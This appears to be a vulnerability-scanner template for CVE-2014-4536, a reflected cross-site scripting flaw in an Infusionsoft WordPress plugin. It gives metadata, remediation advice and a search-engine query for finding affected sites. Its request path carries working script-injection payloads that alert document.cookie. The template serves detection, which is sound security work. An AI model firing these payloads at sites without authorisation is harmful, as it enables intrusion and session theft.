id: CVE-2014-4536 info: name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Cross-Site Scripting author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter. remediation: | Upgrade Infusionsoft Gravity Forms Add-on to version 1.5.7 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 - http://wordpress.org/plugins/infusionsoft/changelog - http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2014-4536 cwe-id: CWE-79 epss-score: 0.00149 epss-percentile: 0.50855 cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: katz product: infusionsoft_gravity_forms framework: wordpress google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/" tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" matchers-condition: and matchers: - type: word part: body words: - '">' - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a00473045022023ac76ff1f606dd977a61d26a03fe9772ac9557ff15dd90ed3b75d3d5e09e123022100d3462b7da91ecc5b479c08af96feaf1a863e747d688a88355f1a0d8656c6ea5f:922c64590222798bb761d5b6d8e72950